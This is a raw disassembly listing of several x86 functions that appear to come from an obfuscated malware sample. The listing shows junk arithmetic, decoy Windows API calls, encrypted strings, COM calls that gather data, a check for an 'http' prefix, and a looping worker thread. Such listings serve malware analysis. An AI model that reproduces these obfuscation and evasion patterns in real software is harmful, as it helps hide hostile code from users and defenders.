mov [ebp+var_52660], edi
call sub_40C4C4 ; GetCurrentThreadId
mov eax, [ebp+var_52618]
mov ds:dword_42FC84, eax
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_44237C
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_5261F], 8Eh
movzx eax, [ebp+var_5261F]
imul eax, 5FFAh
mov [ebp+var_5261F], al
or ebx, ebx
jnz loc_407EF6
cmp [ebp+var_525FE], 0
jz short loc_406FCA
lea edi, [ebp+var_52666]
lea esi, aVo4 ; " vo4|"
mov ecx, 3
rep movsw
jmp loc_407EF6
; ---------------------------------------------------------------------------
loc_406FCA: ; CODE XREF: sub_406D91+21E�j
lea edi, [ebp+var_52667]
lea esi, byte_4423D9
xor ecx, ecx
inc ecx
rep movsb
mov ax, word_4423DA
mov [ebp+var_5266A+1], ax
mov [ebp+var_10001], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52604]
push eax
mov eax, [ebp+var_525FC]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov [ebp+var_52622], 665Eh
add [ebp+var_52622], 1371h
or ebx, ebx
jnz loc_407EF6
call sub_40C518 ; GetProcessHeap
lea eax, [ebp+var_5264C]
push eax
mov eax, [ebp+var_52604]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C5D8 ; IsDebuggerPresent
or ebx, ebx
jnz loc_407EDC
call sub_40C4E8 ; RtlGetLastWin32Error
or [ebp+var_524CC], 0FFFFFFFFh
loc_407057: ; CODE XREF: sub_406D91+BC4�j
mov [ebp+var_52628], 40F0h
inc [ebp+var_52628]
and [ebp+var_52608], 0
and [ebp+var_52610], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_4070E2
mov word ptr [ebp+var_5267C], 43EEh
sub word ptr [ebp+var_5267C], 5463h
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525FC]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
lea edi, [ebp+var_52681]
lea esi, aAVy ; "a&vY"
mov ecx, 5
rep movsb
or ebx, ebx
jnz loc_40792F
mov word ptr [ebp+var_5267C+2], 5163h
movzx eax, word ptr [ebp+var_5267C+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_5267C+2], ax
jmp loc_4071BB
; ---------------------------------------------------------------------------
loc_4070E2: ; CODE XREF: sub_406D91+2EB�j
call sub_40C518 ; GetProcessHeap
mov [ebp+var_52688], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52680], eax
lea eax, [ebp+var_52698]
push eax
lea eax, [ebp+var_52688]
push eax
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_52608]
push eax
push offset dword_447AC8
mov eax, [ebp+var_52690]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_40792F
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_52610]
push eax
mov eax, [ebp+var_52608]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
or ebx, ebx
jz short loc_407173
call sub_40C548 ; GetTickCount
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_40792F
; ---------------------------------------------------------------------------
loc_407173: ; CODE XREF: sub_406D91+3CA�j
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_52610]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
or ebx, ebx
jz short loc_4071BB
call sub_40C554 ; GetVersion
mov eax, [ebp+var_52610]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov ax, word_4423E1
mov [ebp+var_5269A], ax
jmp loc_40792F
; ---------------------------------------------------------------------------
loc_4071BB: ; CODE XREF: sub_406D91+34C�j
; sub_406D91+3F9�j
lea eax, [ebp+var_525EC]
push eax
mov eax, [ebp+var_525E4]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
lea edi, [ebp+var_5266C]
lea esi, byte_4423E3
mov ecx, 3
rep movsb
or ebx, ebx
jnz loc_407E93
lea edi, [ebp+var_5266D]
lea esi, byte_4423E6
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_21784], 0
jmp loc_40791D
; ---------------------------------------------------------------------------
loc_407208: ; CODE XREF: sub_406D91+B98�j
mov [ebp+var_627BC], 58h
movzx eax, [ebp+var_627BC]
imul eax, 0E1Dh
mov [ebp+var_627BC], al
push 0
call sub_40C95C
pop ecx
lea edi, [ebp+var_627D1]
lea esi, aZa6Ca ; "zA6:c"
mov ecx, 7
rep movsb
mov [ebp+var_626B0], 2
mov eax, [ebp+var_21784]
mov [ebp+var_626A8], eax
lea eax, [ebp+var_6269C]
push eax
lea esi, [ebp+var_626B0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_626B0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_525E4]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
or ebx, ebx
jnz loc_407917
mov [ebp+var_627C0], 54A8h
mov eax, 78B7h
mul [ebp+var_627C0]
mov [ebp+var_627F0], eax
mov [ebp+var_627C0], eax
and [ebp+var_626B4], 0
lea eax, [ebp+var_626B4]
push eax
push offset dword_447AA8
mov eax, [ebp+var_6269C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_627C1], 4Fh
movzx eax, [ebp+var_627C1]
imul eax, 303Ch
mov [ebp+var_627C1], al
or ebx, ebx
jnz loc_407608
mov [ebp+var_627C2], 41h
add [ebp+var_627C2], 1
lea eax, [ebp+var_626BC]
push eax
mov eax, [ebp+var_626B4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
call sub_40C518 ; GetProcessHeap
or ebx, ebx
jnz loc_407608
lea edi, [ebp+var_627D7]
lea esi, aFG ; " f>"
mov ecx, 3
rep movsw
lea eax, [ebp+var_6267F]
push eax
push [ebp+var_626BC]
call sub_4068E8
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_62694], edi
and [ebp+var_5267C], 0
jmp short loc_407392
; ---------------------------------------------------------------------------
loc_407369: ; CODE XREF: sub_406D91+60D�j
mov eax, [ebp+var_5267C]
mov al, [ebp+eax+var_6267F]
cmp al, 0Dh
jz short loc_40737E
cmp al, 0Ah
jnz short loc_40738C
loc_40737E: ; CODE XREF: sub_406D91+5E7�j
mov eax, [ebp+var_5267C]
mov [ebp+eax+var_6267F], 0
loc_40738C: ; CODE XREF: sub_406D91+5EB�j
inc [ebp+var_5267C]
loc_407392: ; CODE XREF: sub_406D91+5D6�j
mov eax, [ebp+var_62694]
cmp [ebp+var_5267C], eax
jb short loc_407369
mov eax, dword_4423F4
mov [ebp+var_627DB], eax
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_4073F0
call sub_40C5D8 ; IsDebuggerPresent
push 11h
push offset aNEA ; "ǭߥؾ"
call sub_406CF9
push [ebp+var_21784]
push eax
lea edi, [ebp+var_627BB]
push edi
call sub_40C9D4
lea eax, [ebp+var_627BB]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40C9F8
add esp, 1Ch
jmp short loc_407449
; ---------------------------------------------------------------------------
loc_4073F0: ; CODE XREF: sub_406D91+621�j
lea edi, [ebp+var_627F5]
lea esi, dword_4423F8
mov ecx, 5
rep movsb
push 13h
push offset aENEA ; "ߥحߥؾ"
call sub_406CF9
push [ebp+var_21784]
push [ebp+var_524CC]
push eax
lea edi, [ebp+var_627BB]
push edi
call sub_40C9D4
lea eax, [ebp+var_627BB]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40C9F8
add esp, 20h
mov eax, dword_4423FD
mov [ebp+var_627FA+1], eax
loc_407449: ; CODE XREF: sub_406D91+65D�j
and [ebp+var_5267C], 0
loc_407450: ; CODE XREF: sub_406D91+783�j
mov eax, [ebp+var_5267C]
lea ecx, [ebp+eax+var_6267F]
or eax, 0FFFFFFFFh
loc_407460: ; CODE XREF: sub_406D91+6D4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407460
mov [ebp+var_62688], eax
lea edi, [ebp+var_627E1]
lea esi, aJeth ; "jETH#"
mov ecx, 6
rep movsb
mov eax, [ebp+var_62688]
cmp eax, 0
jz short loc_407492
cmp eax, 0C8h
jbe short loc_407494
loc_407492: ; CODE XREF: sub_406D91+6F8�j
jmp short loc_4074FB
; ---------------------------------------------------------------------------
loc_407494: ; CODE XREF: sub_406D91+6FF�j
cmp [ebp+var_62688], 1
jnz short loc_4074AD
mov eax, [ebp+var_5267C]
cmp [ebp+eax+var_6267F], 20h
jz short loc_4074FB
loc_4074AD: ; CODE XREF: sub_406D91+70A�j
lea edi, [ebp+var_627E4]
lea esi, aKq ; "kQ"
mov ecx, 3
rep movsb
push 1
push offset byte_447550
call sub_406CF9
push eax
lea edi, [ebp+var_10001]
push edi
call sub_40C9F8
call sub_40C5D8 ; IsDebuggerPresent
mov eax, [ebp+var_5267C]
lea eax, [ebp+eax+var_6267F]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40C9F8
add esp, 18h
loc_4074FB: ; CODE XREF: sub_406D91:loc_407492�j
; sub_406D91+71A�j
mov eax, [ebp+var_62688]
inc eax
add [ebp+var_5267C], eax
mov eax, [ebp+var_62694]
cmp [ebp+var_5267C], eax
jb loc_407450
mov [ebp+var_626B5], 49h
movzx eax, [ebp+var_626B5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_626B5], al
and [ebp+var_62690], 0
lea ecx, [ebp+var_10001]
or eax, 0FFFFFFFFh
loc_407544: ; CODE XREF: sub_406D91+7B8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407544
mov [ebp+var_62688], eax
mov [ebp+var_627C4], 4DD8h
add [ebp+var_627C4], 662Fh
mov [ebp+var_5267C], 0
jmp short loc_4075E8
; ---------------------------------------------------------------------------
loc_40756F: ; CODE XREF: sub_406D91+863�j
call sub_40C4E8 ; RtlGetLastWin32Error
mov eax, [ebp+var_5267C]
cmp [ebp+eax+var_10001], 20h
jz short loc_40758B
and [ebp+var_62684], 0
loc_40758B: ; CODE XREF: sub_406D91+7F1�j
call sub_40C518 ; GetProcessHeap
cmp [ebp+var_62684], 0
jnz short loc_4075C3
call sub_40C4B8 ; GetCurrentProcessId
mov eax, [ebp+var_62690]
mov edx, [ebp+var_5267C]
mov dl, [ebp+edx+var_10001]
mov [ebp+eax+var_10001], dl
call sub_40C554 ; GetVersion
inc [ebp+var_62690]
loc_4075C3: ; CODE XREF: sub_406D91+806�j
mov eax, [ebp+var_5267C]
cmp [ebp+eax+var_10001], 20h
jnz short loc_4075DD
mov [ebp+var_62684], 1
loc_4075DD: ; CODE XREF: sub_406D91+840�j
call sub_40C4B8 ; GetCurrentProcessId
inc [ebp+var_5267C]
loc_4075E8: ; CODE XREF: sub_406D91+7DC�j
mov eax, [ebp+var_62688]
cmp [ebp+var_5267C], eax
jb loc_40756F
mov eax, [ebp+var_62690]
mov [ebp+eax+var_10001], 0
loc_407608: ; CODE XREF: sub_406D91+564�j
; sub_406D91+597�j
and [ebp+var_6268C], 0
lea eax, [ebp+var_6268C]
push eax
push offset dword_447AB8
mov eax, [ebp+var_6269C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
lea edi, [ebp+var_627E9]
lea esi, aGg ; "gG',"
mov ecx, 5
rep movsb
or ebx, ebx
jnz loc_4078F4
lea eax, [ebp+var_62698]
push eax
mov eax, [ebp+var_6268C]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
mov [ebp+var_627C8], 21EDh
sub [ebp+var_627C8], 4BF6h
or ebx, ebx
jnz loc_4078DF
mov [ebp+var_627C9], 79h
sub [ebp+var_627C9], 59h
and [ebp+var_52680], 0
jmp loc_4078C6
; ---------------------------------------------------------------------------
loc_407693: ; CODE XREF: sub_406D91+B41�j
call sub_40C554 ; GetVersion
push 0
call sub_40C95C
pop ecx
call sub_40C4C4 ; GetCurrentThreadId
mov [ebp+var_62808], 2
mov eax, [ebp+var_52680]
mov [ebp+var_62800], eax
lea eax, [ebp+var_627FA+2]
push eax
lea esi, [ebp+var_62808]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_62808]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_6268C]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
call sub_40C4B8 ; GetCurrentProcessId
or ebx, ebx
jnz loc_4078C0
mov [ebp+var_6281C], 6C9Fh
mov eax, [ebp+var_6281C]
mov edx, eax
add edx, eax
mov [ebp+var_6281C], edx
and [ebp+var_627F4], 0
lea eax, [ebp+var_627F4]
push eax
push offset dword_447AA8
mov eax, [ebp+var_627FA+2]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov ax, word_44240F
mov [ebp+var_62826], ax
or ebx, ebx
jnz loc_40789D
lea edi, [ebp+var_6282B]
lea esi, aEqf8 ; "EQf8"
mov ecx, 5
rep movsb
cmp [ebp+var_627F4], 0
jz loc_40789D
lea eax, [ebp+var_62818]
push eax
push 0
push [ebp+var_10FA8]
mov eax, [ebp+var_627F4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_62820], 5F69h
inc [ebp+var_62820]
or ebx, ebx
jnz loc_40789D
cmp [ebp+var_62818], 8
jnz loc_40789D
mov [ebp+var_62824], 47CCh
sub [ebp+var_62824], 4C53h
movzx edi, [ebp+var_2]
mov esi, [ebp+var_627F4]
mov [ebp+edi*4+var_10FA4], esi
movzx edi, [ebp+var_2]
mov esi, [ebp+var_52680]
mov [ebp+edi*2+var_1177C], si
lea eax, [ebp+var_62818]
push eax
push 0
push [ebp+var_10FAC]
mov eax, [ebp+var_627F4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C5D8 ; IsDebuggerPresent
or ebx, ebx
jnz loc_407899
mov [ebp+var_6382C], 50D5h
inc [ebp+var_6382C]
lea edi, [ebp+var_63838]
lea esi, word_442416
movsd
movsd
lea edi, [ebp+var_63839]
lea esi, byte_44241E
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_6382A]
push eax
push [ebp+var_62810]
call sub_4068E8
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_63830], edi
cmp [ebp+var_6382A], 0
jz short loc_40788E
cmp edi, 64h
jnb short loc_40788E
lea eax, [ebp+var_6382A]
push eax
movzx eax, [ebp+var_2]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
call sub_40C45C
loc_40788E: ; CODE XREF: sub_406D91+ADB�j
; sub_406D91+AE0�j
mov eax, dword_44241F
mov [ebp+var_6383E+1], eax
loc_407899: ; CODE XREF: sub_406D91+A81�j
inc [ebp+var_2]
loc_40789D: ; CODE XREF: sub_406D91+9BD�j
; sub_406D91+9DD�j ...
cmp [ebp+var_627F4], 0
jz short $+2
call sub_40C4E8 ; RtlGetLastWin32Error
cmp [ebp+var_627FA+2], 0
jz short loc_4078C0
mov eax, [ebp+var_627FA+2]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4078C0: ; CODE XREF: sub_406D91+969�j
; sub_406D91+B21�j
inc [ebp+var_52680]
loc_4078C6: ; CODE XREF: sub_406D91+8FD�j
mov eax, [ebp+var_62698]
cmp [ebp+var_52680], eax
jb loc_407693
jmp short loc_407917
; ---------------------------------------------------------------------------
call sub_40C4B8 ; GetCurrentProcessId
loc_4078DF: ; CODE XREF: sub_406D91+8E2�j
cmp [ebp+var_6268C], 0
jz short loc_4078F4
mov eax, [ebp+var_6268C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4078F4: ; CODE XREF: sub_406D91+8B1�j
; sub_406D91+B55�j
cmp [ebp+var_6269C], 0
jz short loc_407909
mov eax, [ebp+var_6269C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407909: ; CODE XREF: sub_406D91+B6A�j
mov [ebp+var_627CA], 24h
sub [ebp+var_627CA], 13h
loc_407917: ; CODE XREF: sub_406D91+4FC�j
; sub_406D91+B47�j
inc [ebp+var_21784]
loc_40791D: ; CODE XREF: sub_406D91+472�j
mov eax, [ebp+var_525EC]
cmp [ebp+var_21784], eax
jb loc_407208
loc_40792F: ; CODE XREF: sub_406D91+329�j
; sub_406D91+3A5�j ...
mov [ebp+var_5262C], 2E4Fh
sub [ebp+var_5262C], 1F25h
inc [ebp+var_524CC]
mov eax, [ebp+var_5264C]
cmp [ebp+var_524CC], eax
jl loc_407057
mov [ebp+var_5262E], 24B1h
sub [ebp+var_5262E], 67CAh
loc_40796D: ; CODE XREF: sub_406D91+D50�j
push 0
call sub_40C95C
pop ecx
call sub_40C554 ; GetVersion
mov [ebp+var_21786], 0
jmp loc_407A7F
; ---------------------------------------------------------------------------
loc_407988: ; CODE XREF: sub_406D91+CFB�j
mov ax, word_442423
mov word ptr [ebp+var_62690+2], ax
lea eax, [ebp+var_524E0]
push eax
push 0
push [ebp+var_10FA8]
movzx edi, [ebp+var_21786]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_6267C], 4250h
mov eax, [ebp+var_6267C]
mov edx, eax
add edx, eax
mov [ebp+var_6267C], edx
or ebx, ebx
jnz loc_407A78
mov [ebp+var_62684], 699Ch
inc [ebp+var_62684]
lea edi, [ebp+var_62690+1]
lea esi, byte_442425
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_62676]
push eax
push [ebp+var_524D8]
call sub_4068E8
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6268C], edi
mov [ebp+var_6267D], 0
movzx eax, [ebp+var_6267D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_6267D], al
cmp [ebp+var_62676], 0
jz short loc_407A78
mov byte ptr [ebp+var_62688+3], 7Ch
add byte ptr [ebp+var_62688+3], 73h
cmp [ebp+var_6268C], 64h
jnb short loc_407A73
lea eax, [ebp+var_62676]
push eax
movzx eax, [ebp+var_21786]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
call sub_40C45C
loc_407A73: ; CODE XREF: sub_406D91+CC2�j
call sub_40C5D8 ; IsDebuggerPresent
loc_407A78: ; CODE XREF: sub_406D91+C45�j
; sub_406D91+CAB�j
inc [ebp+var_21786]
loc_407A7F: ; CODE XREF: sub_406D91+BF2�j
movzx eax, [ebp+var_21786]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407988
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_44237C
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_5262F], 7Eh
sub [ebp+var_5262F], 0FDh
or ebx, ebx
jnz loc_407EF6
mov [ebp+var_5260A], 772Ch
movzx eax, [ebp+var_5260A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5260A], ax
cmp [ebp+var_525FE], 0
jz loc_40796D
mov [ebp+var_52634], 10F6h
mov eax, 78ABh
mul [ebp+var_52634]
mov [ebp+var_5267C], eax
mov [ebp+var_52634], eax
lea edi, [ebp+var_52674]
lea esi, aJqs ; "#JQS$ "
mov ecx, 7
rep movsb
mov [ebp+var_2177D], 0
push offset byte_41FC80
lea eax, [ebp+var_2177D]
push eax
call sub_40C45C
mov [ebp+var_525E8], 1
mov [ebp+var_1177E], 0
jmp loc_407C45
; ---------------------------------------------------------------------------
loc_407B4B: ; CODE XREF: sub_406D91+EC1�j
mov byte ptr [ebp+var_52680+3], 9Eh
movzx eax, byte ptr [ebp+var_52680+3]
imul eax, 6E80h
mov byte ptr [ebp+var_52680+3], al
movzx eax, [ebp+var_1177E]
imul eax, 64h
cmp [ebp+eax+var_524C8], 0
jz loc_407C3E
lea edi, [ebp+var_52686]
lea esi, aH7a6 ; "h7A6/"
mov ecx, 3
rep movsw
and [ebp+var_525E8], 0
push 4
push offset aAe ; "غ"
call sub_406CF9
movzx edi, [ebp+var_1177E]
push edi
push eax
lea edi, [ebp+var_525DF]
push edi
call sub_40C9D4
lea eax, [ebp+var_525DF]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C9F8
call sub_40C554 ; GetVersion
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C9F8
call sub_40C518 ; GetProcessHeap
push 1
push offset asc_446E9B ; ""
call sub_406CF9
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40C9F8
mov word ptr [ebp+var_52680], 1732h
inc word ptr [ebp+var_52680]
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C9F8
add esp, 3Ch
loc_407C3E: ; CODE XREF: sub_406D91+DE6�j
inc [ebp+var_1177E]
loc_407C45: ; CODE XREF: sub_406D91+DB5�j
movzx eax, [ebp+var_1177E]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407B4B
cmp [ebp+var_525E8], 0
jnz loc_407E93
call sub_40C548 ; GetTickCount
push 1
push offset aA ; ""
call sub_406CF9
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40C9F8
mov [ebp+var_52636], 579Eh
add [ebp+var_52636], 46F3h
lea eax, [ebp+var_10001]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C9F8
add esp, 18h
lea edi, [ebp+var_52677]
lea esi, aY ; "Y;"
mov ecx, 3
rep movsb
cmp ds:byte_41FC80, 68h
jnz short loc_407CE2
cmp ds:byte_41FC81, 74h
jnz short loc_407CE2
cmp ds:byte_41FC82, 74h
jnz short loc_407CE2
cmp ds:byte_41FC83, 70h
jz short loc_407CE7
loc_407CE2: ; CODE XREF: sub_406D91+F34�j
; sub_406D91+F3D�j ...
jmp loc_407E48
; ---------------------------------------------------------------------------
loc_407CE7: ; CODE XREF: sub_406D91+F4F�j
push 8
push offset aOcqqcXo ; ""
call sub_406CF9
mov edi, 8
sub edi, dword_4423B4
push edi
push eax
push offset byte_41FC80
call sub_4017D2
add esp, 14h
cmp eax, 0FFFFh
jz short loc_407D45
push 0Eh
push offset byte_446E81
call sub_406CF9
mov edi, 8
sub edi, dword_4423B4
push edi
push eax
push offset byte_41FC80
call sub_4017D2
add esp, 14h
cmp eax, 0FFFFh
jz loc_407E48
loc_407D45: ; CODE XREF: sub_406D91+F81�j
call sub_40C4B8 ; GetCurrentProcessId
mov [ebp+var_525EE], 0
loc_407D53: ; CODE XREF: sub_406D91+1071�j
mov eax, 13h
sub eax, dword_4423B8
push eax
movzx eax, [ebp+var_525EE]
lea eax, ds:4423C4h[eax]
push eax
push offset byte_41FC80
call sub_4017D2
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_407DB8
mov word ptr [ebp+var_52680+2], 0FC8h
movzx eax, word ptr [ebp+var_52680+2]
imul eax, 4A0Dh
mov word ptr [ebp+var_52680+2], ax
push 1
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F090
call sub_40C4C4 ; GetCurrentThreadId
jmp loc_407E48
; ---------------------------------------------------------------------------
loc_407DB8: ; CODE XREF: sub_406D91+FEF�j
movzx eax, [ebp+var_525EE]
mov [ebp+var_52680], eax
lea ecx, ds:4423C4h[eax]
or eax, 0FFFFFFFFh
loc_407DCF: ; CODE XREF: sub_406D91+1043�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407DCF
mov esi, [ebp+var_52680]
add esi, eax
mov edi, esi
mov [ebp+var_525EE], di
call sub_40C518 ; GetProcessHeap
inc [ebp+var_525EE]
movzx eax, [ebp+var_525EE]
cmp byte_4423C4[eax], 0
jnz loc_407D53
mov [ebp+var_52638], 5BA9h
inc [ebp+var_52638]
push 0
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F090
mov [ebp+var_5263C], 2F5Dh
mov eax, 182Ch
mul [ebp+var_5263C]
mov [ebp-52684h], eax
mov [ebp+var_5263C], eax
loc_407E48: ; CODE XREF: sub_406D91:loc_407CE2�j
; sub_406D91+FAE�j ...
mov [ebp+var_21788], 0
jmp short loc_407E7F
; ---------------------------------------------------------------------------
loc_407E53: ; CODE XREF: sub_406D91+10FB�j
movzx edi, [ebp+var_21788]
cmp [ebp+edi*4+var_10FA4], 0
jz short loc_407E78
movzx edi, [ebp+var_21788]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_407E78: ; CODE XREF: sub_406D91+10D1�j
inc [ebp+var_21788]
loc_407E7F: ; CODE XREF: sub_406D91+10C0�j
movzx eax, [ebp+var_21788]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_407E53
call sub_40C548 ; GetTickCount
loc_407E93: ; CODE XREF: sub_406D91+454�j
; sub_406D91+ECE�j
cmp [ebp+var_525E4], 0
jz short loc_407EA8
mov eax, [ebp+var_525E4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EA8: ; CODE XREF: sub_406D91+1109�j
cmp [ebp+var_52610], 0
jz short loc_407EBD
mov eax, [ebp+var_52610]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EBD: ; CODE XREF: sub_406D91+111E�j
call sub_40C4E8 ; RtlGetLastWin32Error
cmp [ebp+var_52608], 0
jz short loc_407ED7
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407ED7: ; CODE XREF: sub_406D91+1138�j
call sub_40C4C4 ; GetCurrentThreadId
loc_407EDC: ; CODE XREF: sub_406D91+2B4�j
cmp [ebp+var_52604], 0
jz short loc_407EF1
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EF1: ; CODE XREF: sub_406D91+1152�j
call sub_40C4B8 ; GetCurrentProcessId
loc_407EF6: ; CODE XREF: sub_406D91+19A�j
; sub_406D91+210�j ...
cmp [ebp+var_525FC], 0
jz short loc_407F0B
mov eax, [ebp+var_525FC]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F0B: ; CODE XREF: sub_406D91+116C�j
call sub_40C4B8 ; GetCurrentProcessId
loc_407F10: ; CODE XREF: sub_406D91+15A�j
cmp [ebp+var_525F4], 0
jz short loc_407F25
mov eax, [ebp+var_525F4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F25: ; CODE XREF: sub_406D91+1186�j
call sub_40C548 ; GetTickCount
jmp loc_406E09
; ---------------------------------------------------------------------------
loc_407F2F: ; CODE XREF: sub_406D91+55�j
pop edi
pop esi
pop ebx
leave
retn
sub_406D91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F34 proc near ; DATA XREF: sub_407FE2+2E�o
var_1D = byte ptr -1Dh
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset word_442436
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call sub_40C4C4 ; GetCurrentThreadId
mov [ebp+var_4], 0
call sub_40C554 ; GetVersion
loc_407F6B: ; CODE XREF: sub_407F34+69�j
; sub_407F34+93�j
mov edi, dword_4423B4
add edi, 1EDh
push edi
call sub_40C95C
add esp, 4
call sub_40C518 ; GetProcessHeap
call sub_406D91
cmp dword_4423C0, 0
jnz short loc_407F95
jmp short loc_407FD0
; ---------------------------------------------------------------------------
loc_407F95: ; CODE XREF: sub_407F34+5D�j
mov [ebp+var_19], 82h
add [ebp+var_19], 0BDh
jmp short loc_407F6B
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_407FD0
; ---------------------------------------------------------------------------
mov dword ptr [ebp-1Ch], 1
mov eax, [ebp-1Ch]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_1D], 14h
movzx edi, [ebp+var_1D]
mov esi, edi
add esi, edi
mov ebx, esi
mov [ebp+var_1D], bl
jmp short loc_407F6B
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_407FD0: ; CODE XREF: sub_407F34+5F�j
; sub_407F34+72�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
sub_407F34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FE2 proc near ; CODE XREF: sub_40A74E+772�p
var_4 = byte ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_40C4B8 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
mov ds:dword_40F090, eax
mov [ebp+var_1], 3Bh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push offset dword_4423C0
push 0
push 0
push offset sub_407F34
push 0
push 0
call sub_40C704 ; CreateThread
mov ebx, eax
lea edi, [ebp+var_4]
lea esi, word_442442
mov ecx, 3
rep movsb
push ebx
call sub_40C530 ; CloseHandle
mov ebx, 760Dh
add ebx, 242h
pop edi
pop esi
pop ebx
leave
retn
sub_407FE2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
